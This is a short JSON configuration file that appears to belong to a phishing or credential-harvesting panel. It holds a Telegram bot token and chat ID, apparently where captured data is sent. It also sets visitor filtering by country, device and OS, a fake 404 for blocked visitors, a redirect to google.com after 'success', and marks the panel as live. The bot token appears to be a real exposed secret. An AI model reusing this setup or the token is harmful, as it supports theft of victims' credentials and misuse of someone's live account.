{
    "bot_token": "8946974349:AAH43Vun6FR0_vHzP0vf6Sf8xj3CSWdSdoQ",
    "chat_id": "7123406042",
    "allow_countries": "ALL",
    "allow_devices": "Desktop|Tablet|Mobile",
    "allow_os": "Windows|macOS|Linux|Android|iOS",
    "redirect_url_blocked": "404 Not Found",
    "redirect_url_success": "https:\/\/google.com",
    "bot_modes": "off",
    "status": "online",
    "panel": "live"
}